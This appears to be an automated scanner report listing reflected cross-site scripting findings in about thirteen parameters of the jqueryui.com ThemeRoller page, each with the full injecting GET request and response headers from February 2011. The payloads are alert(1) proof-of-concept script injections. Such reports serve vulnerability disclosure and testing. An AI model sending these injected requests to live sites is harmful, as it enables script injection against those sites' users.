The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c359"><script>alert(1)</script>80c2b6e1d8d was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px2c359"><script>alert(1)</script>80c2b6e1d8d HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 114c1"><script>alert(1)</script>04551e80a06 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121114c1"><script>alert(1)</script>04551e80a06&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b8b6"><script>alert(1)</script>24d17bc86e5 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff3b8b6"><script>alert(1)</script>24d17bc86e5&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 216dc"><script>alert(1)</script>01abf8a1ade was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F216dc"><script>alert(1)</script>01abf8a1ade&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff7d"><script>alert(1)</script>b0f69a04f14 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0aaff7d"><script>alert(1)</script>b0f69a04f14&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df80"><script>alert(1)</script>970c39be0f5 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff8df80"><script>alert(1)</script>970c39be0f5&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f43"><script>alert(1)</script>25c4f2d24a5 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=36363611f43"><script>alert(1)</script>25c4f2d24a5&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbdcb"><script>alert(1)</script>a7634bd91cf was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121cbdcb"><script>alert(1)</script>a7634bd91cf&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e42b"><script>alert(1)</script>4fcb9c8818e was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif1e42b"><script>alert(1)</script>4fcb9c8818e&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb184"><script>alert(1)</script>2227218b9c2 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1embb184"><script>alert(1)</script>2227218b9c2&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6902"><script>alert(1)</script>ca9b0958104 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normalf6902"><script>alert(1)</script>ca9b0958104&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120030
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1117f"><script>alert(1)</script>1dd019a3a40 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=4545451117f"><script>alert(1)</script>1dd019a3a40&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:52:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120095
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6491"><script>alert(1)</script>f0203e10f2c was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222b6491"><script>alert(1)</script>f0203e10f2c&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 22:51:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120095
